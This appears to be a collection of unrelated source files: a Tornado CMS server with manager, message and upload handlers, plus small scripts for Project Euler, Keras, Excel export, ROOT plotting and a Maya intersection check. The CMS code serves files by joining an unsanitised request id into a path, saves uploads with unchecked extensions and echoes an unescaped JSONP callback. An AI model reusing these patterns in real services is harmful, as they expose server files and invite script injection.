self.redirect('login.html')
class PageHandler(BaseHandler):
'''
'''
@_trace_wrapper
@_parse_body
def get(self, page):
'''
Render html page
'''
page = page.lower()
# logger.info('argument:{}'.format(self.request.arguments))
# if not page.endswith('.html'):
# page = page + '.html'
# if page.startswith('manager.html'):
# return self.render('login_admin.html')
manager = self.get_argument('manager', '')
if manager:
# manager get it's messages
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
self.render(page, groups=_check_groups_(manager))
else:
# if page in ('newsdetail.html',) and self.is_mobile():
# _id = self.get_argument('id')
# message = manage.get_message(_id)
# if message:
# self.render('m_message.tmpt', **message)
return self.render(page)
class ManagerHandler(BaseHandler):
'''
api/manager/*
maintain administrator account
'''
def _check_admin_(self):
manager = self.get_argument('manager')
if _check_groups_(manager) != 1000:
raise HTTPError(403, reason='Not administrator account')
@_trace_wrapper
@_parse_body
@_check_token
def get(self, user=''):
# user = self.get_argument('manager')
if user:
manager = manage.get_manager(user)
if not manager:
raise HTTPError(404, reason='Can\'t found manager')
self.render_json_response(Code=200, Msg='OK', manager=manager)
else:
managers = manage.get_managers()
self.render_json_response(Code=200, Msg='OK', managers=managers)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, user=''):
'''
add new manager account
'''
self._check_admin_()
# user = self.get_argument('manager', '') or self.get_argument('user', '')
kwargs = {}
kwargs['user'] = self.get_argument('user')
kwargs['mask'] = int(self.get_argument('mask', 0))
kwargs['password'] = self.get_argument('password', '')
kwargs['groups'] = int(self.get_argument('groups'))
manage.create_manager(**kwargs)
self.render_json_response(Code=200, Msg='OK')
@_trace_wrapper
@_parse_body
@_check_token
def put(self, user):
'''
update manager account
'''
self._check_admin_()
# user = self.get_argument('manager')
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs.pop('token')
kwargs.pop('manager')
if 'groups' in kwargs:
kwargs['groups'] = int(kwargs['groups'])
manage.update_manager(user, **kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, user):
'''
delete manager account
'''
self._check_admin_()
# user = self.get_argument('user')
manage.delete_manager(user)
self.render_json_response(**OK)
class GroupsHandler(BaseHandler):
'''
manager groups
'''
@_trace_wrapper
@_parse_body
@_check_token
def get(self, _id=None):
'''
get groups or special group details
'''
if _id:
# get special group
record = manage.get_group(_id)
return self.render_json_response(Code=200, Msg='OK', group=record)
else:
records= manage.get_groups()
return self.render_json_response(Code=200, Msg='OK', groups=records)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=None):
'''
create new groups
'''
name = self.get_argument('name')
note = self.get_argument('note')
print(name, note)
manage.create_group(name, note)
self.render_json_response(Code=200, Msg='OK')
class GMTypeHandler(BaseHandler):
@_trace_wrapper
@_parse_body
@_check_token
def get(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
if _id:
gmtype = manage.get_gmtype(group, _id)
else:
gmtypes = manage.get_gmtypes(group)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
name = self.get_argument('name')
manage.create_gmtype(group, name)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
manage.delete_gmtype(group, _id)
self.render_json_response(**OK)
class AccountHandler(BaseHandler):
'''
manager account login
'''
__ADMIN__ = 1000
@_trace_wrapper
@_parse_body
# @_check_token
def post(self):
'''
manager login
'''
user = self.get_argument('manager')
password = self.get_argument('password')
_user = manage.get_manager(user, password)
if not _user:
raise HTTPError(404, reason='can\'t found account')
# if password != _user['password']:
# raise HTTPError(403, reason='password error')
token = util.token(user)
        _user.pop('password', '')  # drop the password before sending the account back
if _user['groups'] == self.__ADMIN__:
# admin account, response page contains group manager
pass
else:
# only message manager contents
pass
self.render_json_response(User=_user['user'], token=token, **OK)
logger.info('Manager: {} login successfully'.format(user))
#
# self.render('cms_platform.html', token=token, **_user)
# **************************************************
#
# Message handler
#
# **************************************************
class SectionHandler(BaseHandler):
'''
manager message type
'''
@_trace_wrapper
def get(self, _id=''):
if _id:
record = manage.get_section(_id)
self.render_json_response(Code=200, Msg='OK', section=record)
else:
records = manage.get_sections()
self.render_json_response(Code=200, Msg='OK', sections=records)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
'''
add new message type
'''
name = self.get_argument('name')
manage.add_section(name)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id):
'''
delete special message type by id
'''
manage.delete_section(_id)
self.render_json_response(**OK)
class MessageHandler(BaseHandler):
'''
maintain message
message type:
news
notices (use subtitle)
push to app notices (use subtitle)
recruit
'''
def render_messages(self, **kwargs):
'''
Encode dict and return response to client
'''
# self.set_header('Access-Control-Allow-Origin', '*')
origin = self.request.headers.get('Origin', '')
if origin and origin in settings['sites']:
self.set_header('Access-Control-Allow-Origin', origin)
callback = self.get_argument('callback', None)
# check should return jsonp
if callback:
self.set_status(200, kwargs.get('Msg', None))
self.finish('{}({})'.format(callback, json_encoder(kwargs)))
else:
self.set_status(kwargs['Code'], kwargs.get('Msg', None))
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(kwargs))
def render_message_response(self, message):
'''
return html|json based on the Accept contents
'''
accept = self.request.headers.get('Accept', 'text/html')
if accept.startswith('application/json'):
self.render_json_response(Code=200, Msg='OK', **message)
else:
if self.is_mobile():
self.render('m_message.tmpt', **message)
else:
self.render('message.tmpt', **message)
@_trace_wrapper
@_parse_body
#@_check_token
def get(self, _id=''):
'''
get message
'''
# logger.info('id: {}, {}'.format(_id, self.request))
if _id:
message = manage.get_message(_id)
if not message:
raise HTTPError(404, reason='Can\'t found message')
return self.render_message_response(message)
# get messages
manager = self.get_argument('manager', '')
groups = 0
if manager:
# manager get it's messages
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
groups = _check_groups_(manager)
else:
# user get messages
groups = int(self.get_argument('groups'))
label = self.get_argument('label', '')
page = int(self.get_argument('page', 0))
nums = int(self.get_argument('per', 10))
mask = int(self.get_argument('mask', 0))
gmtype = int(self.get_argument('gmtype', 0))
isimg = int(self.get_argument('isimg', 0))
pos = page*nums
messages = manage.get_messages(groups, mask, isimg, gmtype, label, pos, nums)
# logger.info('messages: {}'.format(messages[0]['image']))
isEnd = 1 if len(messages) < nums else 0
# self.render_json_response(Code=200, Msg='OK', messages=messages, end=isEnd)
self.render_messages(Code=200, Msg='OK', messages=messages, end=isEnd)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
'''
create new message record
title subtitle section mask author groups status ctime content image
labels : labes are separate by ' '
'''
logger.info('{}'.format(self.request.arguments))
manager = self.get_argument('manager')
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs['author'] = manager
kwargs.pop('token')
kwargs.pop('manager')
kwargs['groups'] = _check_groups_(manager)
manage.create_message(**kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def put(self, _id):
'''
update message record
'''
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs.pop('token')
kwargs.pop('manager')
manage.update_message(_id, **kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id):
manage.delete_message(_id)
self.render_json_response(**OK)
class UeditorHandler(BaseHandler):
'''
support for ueditor upload images
'''
@_trace_wrapper
@_parse_body
def get(self):
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(ueditor_config.config))
@_trace_wrapper
@_parse_body
def post(self):
file_metas = self.request.files['upfile']
filename, ext = '', ''
for meta in file_metas:
filename = meta['filename']
if '.' in filename and filename[-1] != '.':
ext = filename.split('.')[-1]
content_type = meta['content_type']
now = _now()
mask = util.generate_password(8)
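            # hash the file metadata plus a random salt to build a unique stored name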
md5 = util.md5(filename, content_type, now, mask)
filename = md5.hexdigest()
if ext:
filename = '.'.join([filename, ext])
filepath = os.path.join(UEDITOR_IMAGE_PATH, filename)
# filepath = '.'.join([filepath, ext])
with open(filepath, 'wb') as uf:
uf.write(meta['body'])
# only support signle file upload
break
if filename:
url = UE_IMAGE_PREFIX + filename
# url = '.'.join([url, ext])
self.render_json_response(url=url, state='SUCCESS', **OK)
else:
raise HTTPError(400)
# @tornado.web.stream_request_body
class ImageHandler(BaseHandler):
'''
1. user upload image & update databse
'''
# def initialize(self):
# self.bytes_read = 0
# def data_received(self, data):
# self.bytes_read += len(data)
def _gen_image_id_(self, *args):
now = util.now()
return util.md5(now, *args).hexdigest()
@_trace_wrapper
def get(self, _id):
filepath = os.path.join(UPLOAD_IMAGE_PATH, _id)
logger.info('id:{}, filepath:{}'.format(_id, filepath))
with open(filepath, 'rb') as f:
data = f.read()
self.finish(data)
@_trace_wrapper
# @_parse_body
def post(self, _id=None):
'''
        engineer uploads an image;
        update the engineer's image
'''
file_metas = self.request.files['uploadImg']
filename, ext = _id, ''
for meta in file_metas:
filename = meta['filename']
content_type = meta['content_type']
if '.' in filename and filename[-1] != '.':
ext = filename.split('.')[-1]
if not _id:
filename = self._gen_image_id_(filename, content_type, util.generate_password(8))
if ext:
filename = '.'.join([filename, ext.lower()])
else:
filename = _id
filepath = os.path.join(UPLOAD_IMAGE_PATH, filename.lower())
with open(filepath, 'wb') as uf:
uf.write(meta['body'])
break
if filename:
self.render_json_response(name=UF_IMAGE_PREFIX+filename, **OK)
else:
raise HTTPError(400)
_DEFAULT_BACKLOG = 128
# These errnos indicate that a non-blocking operation must be retried
# at a later time. On most platforms they're the same value, but on
# some they differ
_ERRNO_WOULDBLOCK = (errno.EWOULDBLOCK, errno.EAGAIN)
if hasattr(errno, 'WSAEWOULDBLOCK'):
_ERRNO_WOULDBLOCK += (errno.WSAEWOULDBLOCK, )
def bind_udp_socket(port, address=None, family=socket.AF_UNSPEC, backlog=_DEFAULT_BACKLOG, flags=None):
'''
'''
udp_sockets = []
if address == '':
address = None
if not socket.has_ipv6 and family == socket.AF_UNSPEC:
        family = socket.AF_INET
if flags is None:
flags = socket.AI_PASSIVE
bound_port = None
for res in socket.getaddrinfo(address, port, family, socket.SOCK_DGRAM, 0, flags):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if errno_from_exception(e) == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
if hasattr(socket, 'IPPROTO_IPV6'):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 & IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and bound_port is not None:
sockaddr = tuple([host, bound_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
bound_port = sock.getsockname()[1]
udp_sockets.append(sock)
return udp_sockets
def add_udp_handler(sock, servers, io_loop=None):
'''
    Read incoming datagrams into a 4096-byte buffer
'''
if io_loop is None:
io_loop = tornado.ioloop.IOLoop.current()
def udp_handler(fd, events):
while True:
try:
data, addr = sock.recvfrom(4096)
if data:
# ac data arrived, deal with
pass
except socket.error as e:
if errno_from_exception(e) in _ERRNO_WOULDBLOCK:
                    # _ERRNO_WOULDBLOCK indicates we have received every
                    # datagram that is available
return
import traceback
traceback.print_exc(file=sys.stdout)
except:
import traceback
traceback.print_exc(file=sys.stdout)
io_loop.add_handler(sock.fileno(), udp_handler, tornado.ioloop.IOLoop.READ)
def main():
global logger
tornado.options.parse_command_line()
import trace
trace.init(settings['LOG_CMS_PATH'], options.port)
logger = trace.logger('cms', False)
logger.setLevel(logging.INFO)
bidong_pid = os.path.join(settings['CMS_RUN_PATH'], 'p_{}.pid'.format(options.port))
with open(bidong_pid, 'w') as f:
f.write('{}'.format(os.getpid()))
app = Application()
app.listen(options.port, xheaders=app.settings.get('xheaders', False))
io_loop = tornado.ioloop.IOLoop.instance()
logger.info('CMS Server Listening:{} Started'.format(options.port))
io_loop.start()
if __name__ == '__main__':
main()
|
999,340 | 3da598903397a4fdf6456f6a8fe684f5de761dfc | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
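# Euler's pentagonal number theorem gives the partition recurrence
#   p(n) = sum_{k=1,-1,2,-2,...} (-1)^(k+1) * p(n - k(3k-1)/2)
# over all generalized pentagonal numbers <= n. solve() evaluates it
# modulo 1,000,000 and returns the first n with p(n) % 1000000 == 0
# (which looks like Project Euler problem 78).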
def solve():
p, n = [1], 1
while True:
now, delta, cnt = 0, 1, 0
while delta <= n:
sign = -1 if cnt % 4 > 1 else 1
now = (now + sign * p[n - delta] + 1000000) % 1000000
cnt += 1
k = - (cnt / 2) - 1 if cnt % 2 else cnt / 2 + 1
delta = k * (3 * k - 1) / 2
p.append(now)
if now == 0:
return n
n += 1
return -1
if __name__ == "__main__":
print solve()
|
999,341 | b50eb19c43ad50d56347da86509ffb73cd63f1c5 | from django.apps import AppConfig
class Aik2Config(AppConfig):
name = 'aik2'
|
999,342 | 114f63378a14d5231ef1c699a24bb7e81127f0df | # Evaluating ANN
import pandas as pd
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.model_selection import train_test_split
# Importing the dataset
data_set = pd.read_csv('Churn_Modelling.csv')
X = data_set.iloc[:, 3:13].values
y = data_set.iloc[:, 13].values
# Encoding categorical data
label_encoder_X_1 = LabelEncoder()
X[:, 1] = label_encoder_X_1.fit_transform(X[:, 1])
label_encoder_X_2 = LabelEncoder()
X[:, 2] = label_encoder_X_2.fit_transform(X[:, 2])
one_hot_encoder = OneHotEncoder(categorical_features = [1])
X = one_hot_encoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting the dataset into the Training set and Test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
def build_classifier():
classifier = Sequential()
classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))
classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))
classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))
classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
return classifier
classifier = KerasClassifier(build_fn=build_classifier, batch_size=10, epochs=100)  # pass the function itself, not its result
accuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10, n_jobs=1)
|
999,343 | 1f36e14df8423b069dc099fefb94ec9411f905d3 | """
Purpose: convert danmaku (bullet-comment) JSON into an Excel spreadsheet
Author: Xu Zhao
"""
import openpyxl
import json
# Create a new workbook and worksheet
wb = openpyxl.Workbook()
sheet = wb.create_sheet()
# Adjust column widths for readability
sheet.column_dimensions['A'].width = 10
sheet.column_dimensions['B'].width = 20
sheet.column_dimensions['C'].width = 20
sheet.column_dimensions['D'].width = 50
# Fill in the header row
sheet['A1'] = 'Category'
sheet['B1'] = 'Post time'
sheet['C1'] = 'Poster'
sheet['D1'] = 'Danmaku content'
json_path = 'E:\\Python\\danmu.json'
# Read the JSON file
with open(json_path, 'r', encoding='utf8') as f:
danmu = json.load(f)
data = danmu["data"]
# Fill the rows below the header
for j in range(0, len(data)):
for id in range(0, 4):
sheet[chr(ord('A') + id) + str(j + 2)] = data[j][id]
# Save the workbook
wb.save('E:\\Python\\danmu.xlsx')
|
999,344 | 8137345d040299cd1a1bd1ef045d1efd2e67b315 | with open('food.txt','r') as f:
for line in f:
        print(line.strip())  # .strip() removes leading/trailing whitespace and the newline |
999,345 | 6898968d697fafa90ae0e3fcc7af4885c3384696 | from ROOT import *
import os,sys
gROOT.SetBatch(True)
gROOT.LoadMacro("vecUtils.h+")
gSystem.Load("/home/users/haweber/oxbridgelibrary/lib/liboxbridgekinetics-1.0.so")
gInterpreter.AddIncludePath("/home/users/haweber/oxbridgelibrary/include/oxbridgekinetics-1.0");
gInterpreter.AddIncludePath("/home/users/haweber/oxbridgelibrary/include")
gROOT.ProcessLine(".L /home/users/haweber/oxbridgelibrary/include/Davismt2.cc+")
gROOT.ProcessLine(".L topness.cc+")
gROOT.ProcessLine(".L ScanChainTemp.C+")
ch = []
dataset = []
#input_dir = '/nfs-7/userdata/stop2015/babies_4May2015/'
input_dir = '/nfs-7/userdata/stopRun2/StopBabies_V07_02_08_met30_ge1lep_2jskim/'
output_dir = './results/'+sys.argv[1]
if not os.path.isdir('./results'):
os.mkdir('./results')
if os.path.isdir(output_dir):
print 'output directory '+output_dir +' already exists'
print 'enter a new name for outputs'
sys.exit()
os.mkdir(output_dir)
os.mkdir(output_dir+'/hists')
os.mkdir(output_dir+'/plots')
ch_ttbar = TChain("t")
ch_ttbar.Add(input_dir+'ttbar.root')
ch.append(ch_ttbar)
dataset.append('TTbar')
ch_singleT = TChain('t')
ch_singleT.Add(input_dir+'t_sch.root')
ch_singleT.Add(input_dir+'tbar_sch.root')
ch_singleT.Add(input_dir+'t_tch.root')
ch_singleT.Add(input_dir+'tbar_tch.root')
ch_singleT.Add(input_dir+'t_tW.root')
ch_singleT.Add(input_dir+'tbar_tW.root')
ch.append(ch_singleT)
dataset.append('SingleT')
ch_TTV = TChain('t')
ch_TTV.Add(input_dir+'ttwjets.root')
ch_TTV.Add(input_dir+'ttzjets.root')
ch.append(ch_TTV)
dataset.append('TTV')
ch_WJets = TChain('t')
ch_WJets.Add(input_dir+'wjets.root')
ch.append(ch_WJets)
dataset.append('WJets')
ch_VV = TChain('t')
ch_VV.Add(input_dir+'wzjets.root')
ch_VV.Add(input_dir+'zz.root')
ch.append(ch_VV)
dataset.append('VV')
#ch_DYJets = TChain('t')
#ch_DYJets.Add(input_dir+'dyjets.root')
#ch.append(ch_DYJets)
#dataset.append('DYJets')
ch_Stop_425_325 = TChain('t')
ch_Stop_425_325.Add(input_dir+'stop_425_325.root')
ch.append(ch_Stop_425_325)
dataset.append('Stop_425_325')
ch_Stop_500_325 = TChain('t')
ch_Stop_500_325.Add(input_dir+'stop_500_325.root')
ch.append(ch_Stop_500_325)
dataset.append('Stop_500_325')
ch_Stop_650_325 = TChain('t')
ch_Stop_650_325.Add(input_dir+'stop_650_325.root')
ch.append(ch_Stop_650_325)
dataset.append('Stop_650_325')
ch_Stop_850_100 = TChain('t')
ch_Stop_850_100.Add(input_dir+'stop_850_100.root')
ch.append(ch_Stop_850_100)
dataset.append('Stop_850_100')
test = False
if test: dataset_toloop = dataset[:1]
else: dataset_toloop = dataset
for i,sample in enumerate(dataset_toloop):
ScanChain(ch[i],True,-1,sample,output_dir)
print '################ finished loops, gonna make plots now####################'
gROOT.ProcessLine('.L dataMCplotMaker.cc+')
file = TFile(output_dir+'/hists/TTbar.root')
SetTDRStyle()
bgnames = ["TTbar","SingleT","TTV","WJets","VV"]
signames = ["Stop_425_325","Stop_500_325","Stop_650_325","Stop_850_100"]
#bgnames = ["TTbar","SingleT","TTV","VV"]
sigfiles = map(lambda x:TFile(output_dir+'/hists/'+x+'.root'),signames)
bgfiles = map(lambda x:TFile(output_dir+'/hists/'+x+'.root'),bgnames)
hists = []
#for k in file.GetListOfKeys():hists.append(k.GetName())
hists = ["PostAll_Topness_TTbar","PreMT_Topness_TTbar","Topness_TTbar"]
##loop over histograms to plot
for hist in hists:
bghist = []
sighist = []
options = "--outputName " + output_dir+'/plots/' + hist + " --xAxisLabel " + hist + " --noXaxisUnit --energy 13 --lumi 10 --legendTextSize 0.02 --preserveBackgroundOrder --legendUp 0.05 --legendRight -0.2"
for ibg,bg in enumerate(bgnames):
h1 = TH1F()
h1 = bgfiles[ibg].Get(hist.replace('TTbar',bg))
# if not hZee.InheritsFrom("TH1"):
bghist.append(h1)
for isig,sig in enumerate(signames):
h1 = TH1F()
h1 = sigfiles[isig].Get(hist.replace('TTbar',sig))
sighist.append(h1)
bghist_vector = std.vector('TH1F*')()
bghist_vector.clear()
sighist_vector = std.vector('TH1F*')()
sighist_vector.clear()
bgnames_vector = std.vector(string)()
bgnames_vector.clear()
signames_vector = std.vector(string)()
signames_vector.clear()
for item in bghist:bghist_vector.push_back(item)
for item in sighist:sighist_vector.push_back(item)
for item in bgnames:bgnames_vector.push_back(item)
for item in signames:signames_vector.push_back(item)
null = TH1F()
#dataMCplotMaker(null,bghist_vector,bgnames,"sig x10","",options,sighist_vector,signames)
dataMCplotMaker(null,bghist_vector,bgnames_vector,"sig x10","",options,sighist_vector,signames_vector)
# dataMCplotMaker(null,bghist,bgnames,"sig x10","",options,sighist,signames)
|
999,346 | 6a48b4d05ba13e6826b4f1adb583203d5b1587fc | # Function that tells you what happens when you put a number in
def ifpung(inp):
    if inp == '1':
        print("It popped with a bang")
def idpw_ck(userid, pwd):
    if userid == 'aaa' and pwd == '1234':
        return "Logged in. Welcome, {}".format(userid)
    else:
        return "Login failed. The ID does not exist or the password is wrong" |
999,347 | f53074f9150dca86bc5a8ec2f19637d6e993bde9 | # -*- coding: utf-8 -*-
'''
Created on 2017
@author: yufengsheng
'''
from maya.cmds import *
import maya.mel as mel
import sys
if not pluginInfo('SOuP',q=1,l=1):
loadPlugin('SOuP', qt=True)
def yuCheckAnimatorWin():
windowName='checkAnimatorWin'
if(window(windowName,exists=1)):
deleteUI(windowName)
    window(windowName,title=u'Animation Intersection Check Tool',mxb=0,wh=(514,124))
columnLayout(adj=1)
formLayout('mainForm')
    intSliderGrp('smoothLevelTex',field=1,label=u'Smooth level:',minValue=0,maxValue=10,fieldMinValue=0,fieldMaxValue=10,value=3)
    button('smoothCreateBut',label=u'Create smooth',h=30,c='createSmoothCmd()')
    button('clearSmoothClusterBut',label=u'Clear Smooth and Cluster',h=30,c='removeSmooth_ClusterCmd()')
    floatSliderGrp('boundingObjectRadiusTex',field=1,label=u'BoundingObject radius:',step=0.001,minValue=0,maxValue=1,fieldMinValue=0,fieldMaxValue=1,value=0.025,cc='setBoundingObjRadiusCmd()')
    button('boundingObjectRadiusBut',label=u'Set radius',h=30,w=150,c='setBoundingObjRadiusCmd()')
    button('restoreSelectedCmdBut',label=u'Clear selected checks',w=255,h=30,c='restoreSelectedCmd()')
    button('restoreAllCmdBut',label=u'Clear all checks',w=255,h=30,c='restoreAllCmd()')
formLayout('mainForm',e=1,af=[('smoothLevelTex','left',-70),('smoothLevelTex','top',3),('boundingObjectRadiusTex','left',-35)],
ac=[('smoothCreateBut','left',5,'smoothLevelTex'),('clearSmoothClusterBut','left',5,'smoothCreateBut'),
('boundingObjectRadiusTex','top',10,'smoothLevelTex'),
('boundingObjectRadiusBut','top',10,'smoothLevelTex'),
('boundingObjectRadiusBut','left',5,'boundingObjectRadiusTex'),
('restoreSelectedCmdBut','top',10,'boundingObjectRadiusTex'),
('restoreAllCmdBut','top',10,'boundingObjectRadiusTex'),
('restoreAllCmdBut','left',2,'restoreSelectedCmdBut')])
setParent('..')
    button('checkCmdBut',label=u'Create check',c='checkCmd()')
setParent('..')
showWindow(windowName)
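# How the check works (a summary of the node graph that checkCmd wires up):
# the first selected mesh drives a SOuP boundingObject; every other selected
# mesh gets an attributeTransfer -> arrayDataContainer -> arrayToPointColor
# chain feeding its inMesh, so vertices that fall inside the boundingObject
# are tinted via vertex colors, making intersections visible during playback.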
def checkCmd():
TransformName=''
boudingObjName=''
attributeTransferName=''
objShapeNames=[]
objs=ls(sl=1)
checkNodeGrp='checkNode_grp'
if not objExists(checkNodeGrp):
createNode('transform',n=checkNodeGrp)
for i in range(0,len(objs)):
objShapeNames=listRelatives(objs[i],shapes=1,ni=1)
if i==0:
            # Check whether the object's worldMesh[0] already feeds a boundingObject
if not listConnections(objShapeNames[0]+'.worldMesh[0]',s=0,d=1) or listConnections(objShapeNames[0]+'.worldMesh[0]',s=0,d=1)[0].find('boudingObject')<0:
radiusVal=floatSliderGrp('boundingObjectRadiusTex',q=1,v=1)
TransformName=createNode('transform',n=objs[i]+'boudingObject')
boudingObjName=createNode('boundingObject',n=objs[i]+'boudingObjectShape',p=TransformName)
setAttr(boudingObjName+'.type',3)
setAttr(boudingObjName+'.pointRadius',radiusVal)
setAttr(boudingObjName+'.pointColor',0,1,0,type='double3')
boudingObjShapeName=listRelatives(objs[i],shapes=1,ni=1)
connectAttr(boudingObjShapeName[0]+'.worldMesh[0]',boudingObjName+'.inMesh')
parent(TransformName,checkNodeGrp)
else:
                print 'boundingObject already created'
boudingObjName=listConnections(objShapeNames[0]+'.worldMesh[0]',s=1)[0]
else:
            # Check whether the inMesh attribute is connected
if listConnections(objShapeNames[0]+'.inMesh',s=1):
                # Check whether inMesh is driven by an arrayToPointColor node
if listConnections(objShapeNames[0]+'.inMesh',s=1)[0].find('_arrayToPointColor')==-1:
attributeTransferName=createNode('attributeTransfer',n=objs[i]+'attributeTransfer')
setAttr(attributeTransferName+'.color',1)
setAttr(attributeTransferName+'.solidAlpha',1)
                    # Check whether the attributeTransfer node's boundingObjects[0] is connected
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for attributeTransferAttr in attributeTransferAttrs:
                            # Check whether this boundingObjects slot of the attributeTransfer node is connected
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+'].boundParentMatrix')
if getAttr(objShapeNames[0]+'.displayColors')==0:
setAttr(objShapeNames[0]+'.displayColors',1)
objOutputGeoAttr=listConnections(objShapeNames[0]+'.inMesh',s=1,p=1)
connectAttr(objOutputGeoAttr[0],attributeTransferName+'.inGeometry')
#connectAttr(attributeTransferName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
arrayDataContainerName=soup().create('arrayDataContainer')
arrayDataContainerName=rename(arrayDataContainerName,objs[i]+'arrayDataContainer')
arrayToPointColorName=createNode('arrayToPointColor',n=objs[i]+'arrayToPointColor')
connectAttr(attributeTransferName+'.outRgbaPP',arrayDataContainerName+'.inArray')
connectAttr(arrayDataContainerName+'.outArray',arrayToPointColorName+'.inRgbaPP')
connectAttr(attributeTransferName+'.outGeometry',arrayToPointColorName+'.inGeometry')
connectAttr(arrayToPointColorName+'.outGeometry',objShapeNames[0]+'.inMesh',force=1)
else:
connectToMeshNode=listConnections(objShapeNames[0]+'.inMesh',s=1)[0]
attributeTransferName=listConnections(connectToMeshNode,s=1)[2]
                # Check whether the attributeTransfer node's boundingObjects[0] is connected
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for i in range(0,len(attributeTransferAttrs)):
                        # Check which boundingObjects attribute of the attributeTransfer node is connected
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+'].boundParentMatrix')
elif i>=len(attributeTransferAttrs)-1:
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+'].boundParentMatrix')
else:
if not ls(objs[i]+'cluster'):
clusterName=cluster(objs[i],relative=0,n=objs[i]+'cluster',)
attributeTransferName=createNode('attributeTransfer',n=objs[i]+'attributeTransfer')
setAttr(attributeTransferName+'.color',1)
setAttr(attributeTransferName+'.solidAlpha',1)
clusterGeo=cluster(clusterName[0],q=1,g=1)
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for attributeTransferAttr in attributeTransferAttrs:
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+'].boundParentMatrix')
if getAttr(clusterGeo[0]+'.displayColors')==0:
setAttr(clusterGeo[0]+'.displayColors',1)
connectAttr(clusterName[0]+'.outputGeometry[0]',attributeTransferName+'.inGeometry')
#connectAttr(attributeTransferName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
#parent(clusterName[1],checkNodeGrp)
arrayDataContainerName=soup().create('arrayDataContainer')
arrayDataContainerName=rename(arrayDataContainerName,objs[i]+'arrayDataContainer')
